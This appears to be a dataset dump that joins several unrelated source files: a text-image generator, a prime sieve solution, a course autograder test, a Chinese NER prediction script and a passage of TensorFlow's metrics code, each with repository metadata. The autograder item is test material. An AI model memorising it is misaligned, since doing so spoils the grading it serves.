            for j, word in enumerate(sentence):
                index = self.dict.index(word)
                label_sequence.append(index)
                filted_sentence += word
            # NOTE(review): 'is not' compares identity with a literal; this
            # should be != '' (it happens to work on CPython for '').
            if filted_sentence is not '':
                # record this sample's label sequence and its length
                self.label_len[i] = label_len
                self.label_sequence[i, 0:self.label_len[i]] = label_sequence
            else:  # blank samples are handled separately
                self.label_len[i] = 1
                self.label_sequence[i, 0:self.label_len[i]] = self.blank_label  # blank symbol
        self.label_sequence = self.label_sequence.astype('int')
        self.train_list = sentence_list  # the filtered training set
        self.mapping_list()  # save the image-name / label-sequence map list
    def paint_text(self, text, i):
        """ Render one text line onto a canvas with PIL and save it as i.png.
        :param text: the text line to draw
        :param i: sample index, used as the output filename
        :return: None (the image is written to self.save_path)
        """
        # create the canvas
        canvas = Image.new('RGB', (self.img_w, self.img_h), (255, 255, 255))
        draw = ImageDraw.Draw(canvas)
        # auto-select font sizes that keep the text inside the canvas,
        # leaving at least a small margin
        valid_fonts = {}
        np.random.shuffle(self.font_name)
        cur_fonts = self.fonts.get(self.font_name[0])
        # upper bound of the text area
        limit = [self.img_w - 4, self.img_h - 4]
        try:
            for each in cur_fonts:
                text_size = cur_fonts[each].getsize(text)  # fixme: this is the slow part
                if (text_size[0] < limit[0]) and (text_size[1] < limit[1]):
                    # collect every size that stays inside the bounds
                    valid_fonts[each] = cur_fonts.get(each)
        except:
            # NOTE(review): bare except, and this ValueError is constructed
            # but never raised — the error is silently swallowed.
            ValueError('字体太大')
        # print('寻找字体用时{}s'.format(end - start))
        # np.random.shuffle(valid_fonts)
        keys = list(valid_fonts.keys())
        np.random.shuffle(keys)
        font = valid_fonts.get(keys[0])
        text_size = font.getsize(text)
        assert text_size[0] < self.img_w - 4
        assert text_size[1] < self.img_h - 4
        # random translation inside the remaining free space
        horizontal_space = self.img_w - text_size[0]
        vertical_space = self.img_h - text_size[1]
        start_x = np.random.randint(2, horizontal_space-2)
        start_y = np.random.randint(2, vertical_space-2)
        # draw the current text line
        draw.text((start_x, start_y), text, font=font, fill=(0, 0, 0, 255))
        img_array = np.array(canvas)
        if self.depth == 1:
            # keep a single channel
            grayscale = img_array[:, :, 0]
            # grayscale = add_noise(grayscale)
            ndimg = Image.fromarray(grayscale).convert('L')
            # ndimg.show()
            # save
            save_path = os.path.join(self.save_path, '{}.png'.format(i))  # the index is the filename
            ndimg.save(save_path)
        else:
            img = img_array
            # todo: data augmentation
            # preview if needed
            ndimg = Image.fromarray(img).convert('RGB')
            # ndimg.show()
            # save
            save_path = os.path.join(self.save_path, '{}.png'.format(i))  # the index is the filename
            ndimg.save(save_path)
    def generator(self):
        """Render every training sentence to disk, with a progress bar."""
        n_samples = len(self.train_list)
        # progress bar
        widgets = ["数据集创建中: ", progressbar.Percentage(), " ", progressbar.Bar(), " ", progressbar.ETA()]
        pbar = progressbar.ProgressBar(maxval=n_samples, widgets=widgets).start()
        for i in range(n_samples):
            # draw the current text line
            self.paint_text(self.train_list[i], i)
            pbar.update(i)
        pbar.finish()
if __name__ == '__main__':
    np.random.seed(0)  # fixes how the training corpus is shuffled
    # output directory
    if not os.path.exists(cfg.DATASET_DIR):
        os.makedirs(cfg.DATASET_DIR)
    img_h = 32
    img_w = 128
    depth = 1
    # channel order: channels-last
    input_shape = (img_h, img_w, depth)
    # instantiate the image generator
    # NOTE(review): this existence check duplicates the one a few lines above.
    if not os.path.exists(cfg.DATASET_DIR):
        os.makedirs(cfg.DATASET_DIR)
    img_gen = TextGenerator(input_shape=input_shape, save_path=cfg.DATASET_DIR)
    img_gen.generator()
| [
"dumdumslug@hotmail.com"
] | dumdumslug@hotmail.com |
9b95da6467ddd3c456cc5ff5baf0598155c35fea | 09628ca7c25625fb4776e243590298d387f6912f | /backjoon/math2_4.py | 04ad9b5e71dea83bb61e0885ccbef38a5c532e36 | [] | no_license | ssolssolham/ssolssolham | 89b23b0c577fcc67cd3d8a3eb6a8f686c0ae818b | 3d591ca07480ac34fbdd3c1a3d6dec40feef617d | refs/heads/master | 2021-06-12T16:22:32.387195 | 2020-01-14T15:13:52 | 2020-01-14T15:13:52 | 148,002,925 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 553 | py | import sys
# Sieve of Eratosthenes, variant 4 (Bertrand's postulate / Baekjoon 4948):
# for each input n, count the primes p with n < p <= 2n.
ipt = -1
ipts = []
max = 0  # NOTE(review): shadows the built-in max(); left unchanged here
while ipt != 0:
    # read numbers until the terminating 0; the 0 is appended too and
    # removed again with ipts.pop() below
    ipt = int(sys.stdin.readline().rstrip())
    ipts.append(ipt)
    if max < ipt:
        max = ipt
# sieve every number up to twice the largest input
double_max = 2 * max
a = [False,False] + [True] * (double_max - 1)
primes = []
for i in range(2, double_max + 1):
    if a[i]:
        primes.append(i)  # collected but unused; only a[] is consulted below
        for j in range(2*i, double_max+1, i):
            a[j] = False
ipts.pop()  # drop the trailing 0 sentinel
for i in ipts:
    sum = 0  # NOTE(review): shadows the built-in sum()
    for j in range(i + 1, 2*i + 1):
        if a[j]:
            sum += 1
    print(sum)
| [
"paskal1234@naver.com"
] | paskal1234@naver.com |
0c3ba85209268e4419995bf3b0e59c8dc4ee5a21 | 1a4bc1a11fdb3f714f22f5e0e826b47aa0569de2 | /projects/project02/tests/q1_1.py | 61dd4039d3bf8affab16b12c4665cbd175e3a540 | [] | no_license | taylorgibson/ma4110-fa21 | 201af7a044fd7d99140c68c48817306c18479610 | a306e1b6e7516def7de968781f6c8c21deebeaf5 | refs/heads/main | 2023-09-05T21:31:44.259079 | 2021-11-18T17:42:15 | 2021-11-18T17:42:15 | 395,439,687 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 243 | py | test = { 'name': 'q1_1',
'points': None,
'suites': [{'cases': [{'code': '>>> type(all_unique_causes) in [np.ndarray, list]\nTrue', 'hidden': False, 'locked': False}], 'scored': True, 'setup': '', 'teardown': '', 'type': 'doctest'}]}
| [
"taylorgibson@gmail.com"
] | taylorgibson@gmail.com |
4824a2ce716332ac9003208ee8e5242619b3e1e8 | fb8f496a0ea0a416a5ee214ca308953392fb08ff | /predict.py | cf0c635b320c85db397e915d78c9e0d26067baed | [] | no_license | Noba1anc3/CH-NER | 32ba6138d4344052844698ee917a5910997ec3ed | 82f3ab07b2bf7a5b7a4debe6c074c9801b8f2fcf | refs/heads/master | 2023-04-05T05:52:29.132299 | 2020-04-05T10:10:36 | 2020-04-05T10:10:36 | 252,642,674 | 2 | 0 | null | 2023-03-24T23:27:38 | 2020-04-03T05:43:07 | HTML | UTF-8 | Python | false | false | 9,658 | py | import numpy as np
import tensorflow as tf
from tensorflow.contrib.crf import viterbi_decode
from copy import deepcopy
import re
from model import BiLSTM_CRF
from utils import train_utils
from data_process import read_dictionary
import utils.config as cf
# Parameter setup: load prediction-time configuration and cap GPU memory use.
params = cf.ConfigPredict('predict', 'config/params.conf')
params.load_config()
config = tf.ConfigProto()
config.gpu_options.allow_growth = True  # grow GPU memory on demand
config.gpu_options.per_process_gpu_memory_fraction = 0.3  # at most 30% of GPU memory
def predict_one_batch(model, ses, seqs):
    """
    Created by jty
    Prediction engine: feed one batch of sentence ids through the restored
    model and decode the best tag-id sequence for each sentence.
    :param model: the restored BiLSTM-CRF model
    :param ses: the TensorFlow session to run in
    :param seqs: one batch of sentences as word-id sequences
    :return: label_list, seq_len_list — decoded tag ids and sentence lengths
    """
    feed_dict, seq_len_list = train_utils.get_feed_dict(model, seqs, drop_keep=1.0)
    # transition_params is the CRF transition matrix computed by crf_log_likelihood
    log_its, transition_params = ses.run([model.log_its, model.transition_params],
                                         feed_dict=feed_dict)
    label_list = []
    # CRF decoding is the default: run Viterbi over each sentence's logits
    for log_it, seq_len in zip(log_its, seq_len_list):
        vtb_seq, _ = viterbi_decode(log_it[:seq_len], transition_params)
        label_list.append(vtb_seq)
    return label_list, seq_len_list
def demo_one(model, ses, sent, batch_size, vocab, shuffle, tag2label):
    """
    Created by jty
    Predict the tag ids for one input sentence and convert them to tag strings.
    :param model: the restored model
    :param ses: the TensorFlow session to use
    :param sent: the sentence data to run entity extraction on
    :param batch_size: number of sentences per prediction batch
    :param vocab: word2id mapping
    :param shuffle: defaults to False
    :return: tag — predicted tag strings for the first sentence
    """
    # batch_yield maps each character of the input to its word id and each
    # label through tag2label
    label_list = []
    for seqs, labels in train_utils.batch_yield(sent, batch_size, vocab, tag2label, shuffle):
        label_list_, _ = predict_one_batch(model, ses, seqs)
        label_list.extend(label_list_)
    label2tag = {}
    for tag, label in tag2label.items():
        # NOTE(review): label 0 maps to the integer 0 rather than its tag
        # string ('O'); downstream code only compares against 'B-*'/'I-*'
        # strings, so this appears intentional — confirm.
        label2tag[label] = tag if label != 0 else label
    tag = [label2tag[label] for label in label_list[0]]
    return tag
"""
Created by jty
数据后处理
根据输入的tag和句子返回对应的字符
其中包括抽取出对应的人名、地名、组织名
"""
def get_entity(tag_seq, char_seq):
    """Split a BIO tag sequence into its (PER, LOC, ORG) entity string lists.

    :param tag_seq: sequence of BIO tags aligned with char_seq
    :param char_seq: sequence of characters
    :return: tuple (PER, LOC, ORG) of extracted entity-string lists
    """
    extractors = (get_PER_entity, get_LOC_entity, get_ORG_entity)
    return tuple(extract(tag_seq, char_seq) for extract in extractors)
# 输出PER对应的字符
def get_PER_entity(tag_seq, char_seq):
    """Collect person-name (PER) entities from parallel tag/char sequences.

    Fixes relative to the original: the ``str.replace`` results were never
    assigned, so '\\n'/'\\r' were not actually removed (get_ORG_entity did
    this correctly — the three extractors now agree); an 'I-PER' with no
    preceding 'B-PER' raised NameError; and the fragile ``locals()`` /
    ``del`` accumulator idiom is replaced with an explicit flag.

    :param tag_seq: sequence of BIO tags ('B-PER', 'I-PER', anything else)
    :param char_seq: sequence of characters aligned with ``tag_seq``
    :return: list of entity strings, stripped and with '\\n'/'\\r' removed
    """
    PER = []
    chunk = ''
    in_entity = False
    for tag, char in zip(tag_seq, char_seq):
        if tag == 'B-PER':
            if in_entity:
                # flush the entity already in progress
                PER.append(chunk.strip().replace('\n', '').replace('\r', ''))
            chunk = char
            in_entity = True
        elif tag == 'I-PER':
            if in_entity:
                chunk += char
            else:
                # tolerate an orphan I-PER by starting a new entity
                chunk = char
                in_entity = True
        else:
            if in_entity:
                PER.append(chunk.strip().replace('\n', '').replace('\r', ''))
                in_entity = False
    if in_entity:
        # entity running through the end of the sequence
        PER.append(chunk.strip().replace('\n', '').replace('\r', ''))
    return PER
# 输出LOC对应的字符
def get_LOC_entity(tag_seq, char_seq):
    """Collect location (LOC) entities from parallel tag/char sequences.

    Fixes relative to the original: the ``str.replace`` results were never
    assigned, so '\\n'/'\\r' were not actually removed (get_ORG_entity did
    this correctly — the three extractors now agree); an 'I-LOC' with no
    preceding 'B-LOC' raised NameError; and the fragile ``locals()`` /
    ``del`` accumulator idiom is replaced with an explicit flag.

    :param tag_seq: sequence of BIO tags ('B-LOC', 'I-LOC', anything else)
    :param char_seq: sequence of characters aligned with ``tag_seq``
    :return: list of entity strings, stripped and with '\\n'/'\\r' removed
    """
    LOC = []
    chunk = ''
    in_entity = False
    for tag, char in zip(tag_seq, char_seq):
        if tag == 'B-LOC':
            if in_entity:
                # flush the entity already in progress
                LOC.append(chunk.strip().replace('\n', '').replace('\r', ''))
            chunk = char
            in_entity = True
        elif tag == 'I-LOC':
            if in_entity:
                chunk += char
            else:
                # tolerate an orphan I-LOC by starting a new entity
                chunk = char
                in_entity = True
        else:
            if in_entity:
                LOC.append(chunk.strip().replace('\n', '').replace('\r', ''))
                in_entity = False
    if in_entity:
        # entity running through the end of the sequence
        LOC.append(chunk.strip().replace('\n', '').replace('\r', ''))
    return LOC
# 输出ORG对应的字符
def get_ORG_entity(tag_seq, char_seq):
    """Collect organisation (ORG) entities from parallel tag/char sequences.

    Fixes relative to the original: an 'I-ORG' with no preceding 'B-ORG'
    raised NameError, and the fragile ``locals()`` / ``del`` accumulator
    idiom is replaced with an explicit flag.  Cleaning (strip plus removal
    of '\\n'/'\\r'), which this extractor already did correctly, is kept.

    :param tag_seq: sequence of BIO tags ('B-ORG', 'I-ORG', anything else)
    :param char_seq: sequence of characters aligned with ``tag_seq``
    :return: list of entity strings, stripped and with '\\n'/'\\r' removed
    """
    ORG = []
    chunk = ''
    in_entity = False
    for tag, char in zip(tag_seq, char_seq):
        if tag == 'B-ORG':
            if in_entity:
                # flush the entity already in progress
                ORG.append(chunk.strip().replace('\n', '').replace('\r', ''))
            chunk = char
            in_entity = True
        elif tag == 'I-ORG':
            if in_entity:
                chunk += char
            else:
                # tolerate an orphan I-ORG by starting a new entity
                chunk = char
                in_entity = True
        else:
            if in_entity:
                ORG.append(chunk.strip().replace('\n', '').replace('\r', ''))
                in_entity = False
    if in_entity:
        # entity running through the end of the sequence
        ORG.append(chunk.strip().replace('\n', '').replace('\r', ''))
    return ORG
def predict(model, batch_size, vocab, tag2label, demo_sent, shuffle=False):
    """
    Created by jty
    Top-level prediction routine.
    Input: the saved model, the prediction batch size, the word2id dictionary
    and the sentence entered in the UI to run entity extraction on.
    Output: the extracted PER/LOC/ORG entities, each with item/tag/length/
    offset metadata keyed by a 1-based running id.
    :param model: the restored model
    :param batch_size: number of sentences per prediction batch
    :param vocab: word2id
    :param shuffle: defaults to False
    """
    s_id = 1
    sent_id = {}  # 1-based position -> character; used to locate entity offsets
    ckpt_file = tf.train.latest_checkpoint(params.model_path)
    print(ckpt_file)
    saver = tf.train.Saver()
    with tf.Session(config=config) as sess:
        # print('============= demo =============')
        saver.restore(sess, ckpt_file)
        # print('Please input your sentence:')
        # demo_sent = input()
        #demo_sent = '我在北京上北京大学'
        if demo_sent == '' or demo_sent.isspace():
            print('See you next time!')
        else:
            # assign a 1-based index to every character of the input
            for word in demo_sent:
                sent_id[s_id] = word
                s_id += 1
            demo_sent = list(demo_sent.strip())
            demo_data = [(demo_sent, ['O'] * len(demo_sent))]
            tag = demo_one(model, sess, demo_data, batch_size, vocab, shuffle, tag2label)
            PER, LOC, ORG = get_entity(tag, demo_sent)
            PER_local = {}
            LOC_local = {}
            ORG_local = {}
            p_id = 1
            l_id = 1
            o_id = 1
            PER_mess = {}
            LOC_mess = {}
            ORG_mess = {}
            # record length and position info for each PER entity; the scan
            # resumes at i so repeated surface forms get successive offsets
            i = 1
            for word in PER:
                PER_local['item'] = word
                PER_local['tag'] = 'PER'
                PER_local['length'] = len(word)
                for j in range(i, len(sent_id)):
                    # match on the entity's first character only
                    if word[0] == sent_id[j]:
                        PER_local['offset'] = j
                        i = j + len(word)
                        break
                PER_mess[p_id] = deepcopy(PER_local)
                p_id += 1
            # record length and position info for each LOC entity
            i = 1
            for word in LOC:
                LOC_local['item'] = word
                LOC_local['tag'] = 'LOC'
                LOC_local['length'] = len(word)
                for j in range(i, len(sent_id)):
                    if word[0] == sent_id[j]:
                        LOC_local['offset'] = j
                        i = j + len(word)
                        break
                LOC_mess[l_id] = deepcopy(LOC_local)
                l_id += 1
            # record length and position info for each ORG entity
            i = 1
            for word in ORG:
                ORG_local['item'] = word
                ORG_local['tag'] = 'ORG'
                ORG_local['length'] = len(word)
                for j in range(i, len(sent_id)):
                    if word[0] == sent_id[j]:
                        ORG_local['offset'] = j
                        i = j + len(word)
                        break
                ORG_mess[o_id] = deepcopy(ORG_local)
                o_id += 1
            #print(PER_mess, LOC_mess, ORG_mess)
            return PER_mess, LOC_mess, ORG_mess
def run(demo_sent, flag=False):
    """Build the BiLSTM-CRF graph and run entity extraction on demo_sent.

    :param demo_sent: the sentence to extract entities from
    :param flag: when True, return the (PER, LOC, ORG) metadata dicts;
        otherwise the function returns None
    """
    # Random embeddings only size the graph; the trained weights are
    # restored from the checkpoint inside predict().
    embedding_mat = np.random.uniform(-0.25, 0.25, (len(read_dictionary(params.vocab_path)), params.embedding_dim))
    embedding_mat = np.float32(embedding_mat)
    embeddings = embedding_mat
    num_tags = len(params.tag2label)
    summary_path = "logs"
    model = BiLSTM_CRF(embeddings, params.update_embedding, params.hidden_dim, num_tags, params.clip, summary_path,
                       params.optimizer)
    model.build_graph()
    PER_mess, LOC_mess, ORG_mess = predict(model, params.batch_size, read_dictionary(params.vocab_path), params.tag2label, demo_sent)
    if flag:
        return PER_mess, LOC_mess, ORG_mess
#run('我在北京上北京大学,周恩来是中国总理,我喜欢北京。我在清华大学,毛泽东是中国主席,他去过苏联。') | [
"zxryhjp@yahoo.co.jp"
] | zxryhjp@yahoo.co.jp |
26918a548c2f53fe227743b0c90bdc04e5101662 | 0e27a64e42d87e049284ad263b807e4c64057de9 | /tensorflow/python/ops/metrics_impl.py | 392bb5ea18c96e2ac1e85c7af7d70fba4d7bbd61 | [
"Apache-2.0"
] | permissive | shaayaan16/tensorflow | f721776f322e8e780cd569a7df026886317b9ac5 | 1ec32ec396d8efebac37325edf94b8948f1397b4 | refs/heads/master | 2021-01-12T02:04:58.634427 | 2017-06-07T05:10:35 | 2017-06-07T05:10:35 | 78,465,880 | 0 | 0 | null | 2017-01-09T20:25:38 | 2017-01-09T20:25:38 | null | UTF-8 | Python | false | false | 116,067 | py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Implementation of tf.metrics module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import confusion_matrix
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import sets
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
def _local_variable(initial_value, validate_shape=True, name=None):
  """Creates a non-trainable variable registered as a local variable.

  The variable is placed in the `GraphKeys.LOCAL_VARIABLES` collection, so it
  is handled by the local-variables initializer instead of being saved with
  the model.

  Args:
    initial_value: See variables.Variable.__init__.
    validate_shape: See variables.Variable.__init__.
    name: See variables.Variable.__init__.

  Returns:
    The newly created variable.
  """
  return variables.Variable(
      initial_value,
      trainable=False,
      collections=[ops.GraphKeys.LOCAL_VARIABLES],
      validate_shape=validate_shape,
      name=name)
def _remove_squeezable_dimensions(labels, predictions, weights):
  """Internal version of _remove_squeezable_dimensions which handles weights.

  Squeezes `predictions` and `labels` if their rank differs by 1.
  Squeezes `weights` if its rank is 1 more than the new rank of `predictions`

  This will use static shape if available. Otherwise, it will add graph
  operations, which could result in a performance hit.

  Args:
    labels: Label values, a `Tensor` whose dimensions match `predictions`.
    predictions: Predicted values, a `Tensor` of arbitrary dimensions.
    weights: Optional weight `Tensor`. It will be squeezed if its rank is 1
      more than the new rank of `predictions`

  Returns:
    Tuple of `labels`, `predictions` and `weights` (in that order), possibly
    with the last dimension squeezed.
  """
  labels, predictions = confusion_matrix.remove_squeezable_dimensions(
      labels, predictions)
  predictions.get_shape().assert_is_compatible_with(labels.get_shape())
  if weights is not None:
    weights = ops.convert_to_tensor(weights)
    predictions_shape = predictions.get_shape()
    predictions_rank = predictions_shape.ndims
    weights_shape = weights.get_shape()
    weights_rank = weights_shape.ndims
    if (predictions_rank is not None) and (weights_rank is not None):
      # Use static rank: squeeze only when weights has exactly one extra dim.
      if weights_rank - predictions_rank == 1:
        weights = array_ops.squeeze(weights, [-1])
    elif (weights_rank is None) or (
        weights_shape.dims[-1].is_compatible_with(1)):
      # Use dynamic rank: decide at graph-execution time whether weights has
      # one more dimension than predictions, and squeeze only in that case.
      weights = control_flow_ops.cond(
          math_ops.equal(array_ops.rank(weights),
                         math_ops.add(array_ops.rank(predictions), 1)),
          lambda: array_ops.squeeze(weights, [-1]),
          lambda: weights)
  return labels, predictions, weights
def _maybe_expand_labels(labels, predictions):
  """If necessary, expand `labels` along last dimension to match `predictions`.

  Args:
    labels: `Tensor` or `SparseTensor` with shape
      [D1, ... DN, num_labels] or [D1, ... DN]. The latter implies
      num_labels=1, in which case the result is an expanded `labels` with shape
      [D1, ... DN, 1].
    predictions: `Tensor` with shape [D1, ... DN, num_classes].

  Returns:
    `labels` with the same rank as `predictions`.

  Raises:
    ValueError: if `labels` has invalid shape.
  """
  with ops.name_scope(None, 'expand_labels', (labels, predictions)) as scope:
    labels = sparse_tensor.convert_to_tensor_or_sparse_tensor(labels)
    # If sparse, expand sparse shape: append a size-1 dimension when
    # predictions has one more dimension than the sparse labels.
    if isinstance(labels, sparse_tensor.SparseTensor):
      return control_flow_ops.cond(
          math_ops.equal(
              array_ops.rank(predictions),
              array_ops.size(labels.dense_shape) + 1),
          lambda: sparse_ops.sparse_reshape(  # pylint: disable=g-long-lambda
              labels,
              shape=array_ops.concat_v2((labels.dense_shape, (1,)), 0),
              name=scope),
          lambda: labels)
    # Otherwise, try to use static shape. Ranks equal -> nothing to do;
    # predictions exactly one rank higher -> expand; anything else is invalid.
    labels_rank = labels.get_shape().ndims
    if labels_rank is not None:
      predictions_rank = predictions.get_shape().ndims
      if predictions_rank is not None:
        if predictions_rank == labels_rank:
          return labels
        if predictions_rank == labels_rank + 1:
          return array_ops.expand_dims(labels, -1, name=scope)
        raise ValueError(
            'Unexpected labels shape %s for predictions shape %s.' % (
                labels.get_shape(), predictions.get_shape()))
    # Otherwise, use dynamic shape: the rank comparison happens at run time,
    # so an invalid rank difference cannot be raised here.
    return control_flow_ops.cond(
        math_ops.equal(array_ops.rank(predictions), array_ops.rank(labels) + 1),
        lambda: array_ops.expand_dims(labels, -1, name=scope),
        lambda: labels)
def _create_local(name, shape, collections=None, validate_shape=True,
                  dtype=dtypes.float32):
  """Creates a zero-initialized, non-trainable local variable.

  Args:
    name: The name of the new or existing variable.
    shape: Shape of the new or existing variable.
    collections: A list of collection names to which the Variable will be
      added (in addition to `GraphKeys.LOCAL_VARIABLES`).
    validate_shape: Whether to validate the shape of the variable.
    dtype: Data type of the variable.

  Returns:
    The created variable.
  """
  # Local variables live in tf.GraphKeys.LOCAL_VARIABLES so they are reset by
  # the local-variables initializer and excluded from model checkpoints.
  all_collections = list(collections or []) + [ops.GraphKeys.LOCAL_VARIABLES]
  return variables.Variable(
      initial_value=array_ops.zeros(shape, dtype=dtype),
      name=name,
      trainable=False,
      collections=all_collections,
      validate_shape=validate_shape)
def _assert_weights_rank(weights, values):
  """Asserts `weights` is a scalar or has the same rank as `values`."""
  valid_ranks = (0, array_ops.rank(values))
  return check_ops.assert_rank_in(weights, valid_ranks)
def _broadcast_weights(weights, values):
  """Broadcasts `weights` to the same shape as `values`.

  Follows the same broadcast rules as `multiply(weights, values)`. When
  computing a weighted average, broadcast `weights` with this function before
  summing them; e.g.,
  `reduce_sum(w * v) / reduce_sum(_broadcast_weights(w, v))`.

  Args:
    weights: `Tensor` whose rank is either 0, or the same rank as `values`,
      and must be broadcastable to `values` (all dimensions either `1` or
      equal to the corresponding `values` dimension).
    values: `Tensor` of any shape.

  Returns:
    `weights` broadcast to the shape of `values`.

  Raises:
    ValueError: if `weights` rank is invalid.
  """
  weights_shape = weights.get_shape()
  values_shape = values.get_shape()
  # Fast path: if both shapes are statically known and already compatible,
  # no graph ops are needed at all.
  shapes_match_statically = (
      weights_shape.is_fully_defined() and
      values_shape.is_fully_defined() and
      weights_shape.is_compatible_with(values_shape))
  if shapes_match_statically:
    return weights
  # Otherwise validate the rank at run time, then materialize the broadcast
  # by multiplying with a ones tensor shaped like `values`.
  rank_assertion = _assert_weights_rank(weights, values)
  with ops.control_dependencies((rank_assertion,)):
    return math_ops.multiply(
        weights, array_ops.ones_like(values), name='broadcast_weights')
def _safe_div(numerator, denominator, name):
  """Divides two values, returning 0 if the denominator is <= 0.

  Args:
    numerator: A real `Tensor`.
    denominator: A real `Tensor`, with dtype matching `numerator`.
    name: Name for the returned op.

  Returns:
    0 if `denominator` <= 0, else `numerator` / `denominator`
  """
  denominator_is_positive = math_ops.greater(denominator, 0)
  quotient = math_ops.truediv(numerator, denominator)
  # Elementwise select: the quotient where the denominator is positive,
  # zero everywhere else.
  return array_ops.where(denominator_is_positive, quotient, 0, name=name)
def _safe_scalar_div(numerator, denominator, name):
  """Divides two values, returning 0 if the denominator is 0.

  Args:
    numerator: A scalar `float64` `Tensor`.
    denominator: A scalar `float64` `Tensor`.
    name: Name for the returned op.

  Returns:
    0 if `denominator` == 0, else `numerator` / `denominator`
  """
  # Static rank checks only; no runtime assertions are added.
  numerator.get_shape().with_rank_at_most(1)
  denominator.get_shape().with_rank_at_most(1)
  def _zero():
    return array_ops.constant(0.0, dtype=dtypes.float64)
  def _quotient():
    return math_ops.div(numerator, denominator)
  # cond builds both branches but executes only the taken one, so no
  # division by zero ever runs.
  return control_flow_ops.cond(
      math_ops.equal(array_ops.constant(0.0, dtype=dtypes.float64),
                     denominator),
      _zero,
      _quotient,
      name=name)
def mean(values, weights=None, metrics_collections=None,
         updates_collections=None, name=None):
  """Computes the (weighted) streaming mean of the given values.

  Creates two local accumulator variables, `total` (running weighted sum of
  `values`) and `count` (running sum of weights, or element count when
  `weights` is None). The metric tensor is the idempotent ratio
  `total / count`; `update_op` folds one batch into both accumulators and
  then returns the updated ratio.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask
  values.

  Args:
    values: A `Tensor` of arbitrary dimensions.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `values`, and must be broadcastable to `values` (i.e., all dimensions
      must be either `1`, or the same as the corresponding `values`
      dimension).
    metrics_collections: An optional list of collections that the mean tensor
      should be added to.
    updates_collections: An optional list of collections that `update_op`
      should be added to.
    name: An optional variable_scope name.

  Returns:
    mean: A `Tensor` representing the current mean, the value of `total`
      divided by `count`.
    update_op: An operation that increments the `total` and `count` variables
      appropriately and whose value matches `mean_value`.

  Raises:
    ValueError: If `weights` is not `None` and its shape doesn't match
      `values`, or if either `metrics_collections` or `updates_collections`
      are not a list or tuple.
  """
  with variable_scope.variable_scope(name, 'mean', (values, weights)):
    values = math_ops.to_float(values)
    # Scalar accumulators (creation order fixes their variable names).
    total = _create_local('total', shape=[])
    count = _create_local('count', shape=[])
    if weights is None:
      # Unweighted: every element contributes 1 to the count.
      batch_count = math_ops.to_float(array_ops.size(values))
    else:
      weights = _broadcast_weights(math_ops.to_float(weights), values)
      values = math_ops.multiply(values, weights)
      batch_count = math_ops.reduce_sum(weights)
    accumulate_total = state_ops.assign_add(
        total, math_ops.reduce_sum(values))
    accumulate_count = state_ops.assign_add(count, batch_count)
    mean_t = _safe_div(total, count, 'value')
    # The update op reads the accumulators only after both adds have run.
    with ops.control_dependencies([accumulate_total, accumulate_count]):
      update_op = _safe_div(total, count, 'update_op')
    if metrics_collections:
      ops.add_to_collections(metrics_collections, mean_t)
    if updates_collections:
      ops.add_to_collections(updates_collections, update_op)
    return mean_t, update_op
def accuracy(labels, predictions, weights=None, metrics_collections=None,
             updates_collections=None, name=None):
  """Calculates how often `predictions` matches `labels`.

  Accuracy is the (weighted) streaming mean of a 0/1 indicator that is 1.0
  wherever `predictions` equals `labels`. The heavy lifting — the `total` and
  `count` accumulators and the `update_op` — is delegated to `mean`.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask
  values.

  Args:
    labels: The ground truth values, a `Tensor` whose shape matches
      `predictions`.
    predictions: The predicted values, a `Tensor` of any shape.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and must be broadcastable to `labels` (i.e., all dimensions
      must be either `1`, or the same as the corresponding `labels`
      dimension).
    metrics_collections: An optional list of collections that `accuracy`
      should be added to.
    updates_collections: An optional list of collections that `update_op`
      should be added to.
    name: An optional variable_scope name.

  Returns:
    accuracy: A `Tensor` representing the accuracy, the value of `total`
      divided by `count`.
    update_op: An operation that increments the `total` and `count` variables
      appropriately and whose value matches `accuracy`.

  Raises:
    ValueError: If `predictions` and `labels` have mismatched shapes, or if
      `weights` is not `None` and its shape doesn't match `predictions`, or
      if either `metrics_collections` or `updates_collections` are not a list
      or tuple.
  """
  labels, predictions, weights = _remove_squeezable_dimensions(
      labels, predictions, weights=weights)
  predictions.get_shape().assert_is_compatible_with(labels.get_shape())
  # Compare in the dtype of `labels`.
  if predictions.dtype != labels.dtype:
    predictions = math_ops.cast(predictions, labels.dtype)
  matches = math_ops.equal(predictions, labels)
  is_correct = math_ops.to_float(matches)
  return mean(is_correct, weights, metrics_collections,
              updates_collections, name or 'accuracy')
def _confusion_matrix_at_thresholds(
    labels, predictions, thresholds, weights=None, includes=None):
  """Computes true_positives, false_negatives, true_negatives, false_positives.

  This function creates up to four local variables, `true_positives`,
  `true_negatives`, `false_positives` and `false_negatives`.
  `true_positive[i]` is defined as the total weight of values in `predictions`
  above `thresholds[i]` whose corresponding entry in `labels` is `True`.
  `false_negatives[i]` is defined as the total weight of values in `predictions`
  at most `thresholds[i]` whose corresponding entry in `labels` is `True`.
  `true_negatives[i]` is defined as the total weight of values in `predictions`
  at most `thresholds[i]` whose corresponding entry in `labels` is `False`.
  `false_positives[i]` is defined as the total weight of values in `predictions`
  above `thresholds[i]` whose corresponding entry in `labels` is `False`.

  For estimation of these metrics over a stream of data, for each metric the
  function respectively creates an `update_op` operation that updates the
  variable and returns its value.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.

  Args:
    labels: A `Tensor` whose shape matches `predictions`. `labels` will be cast
      to `bool`.
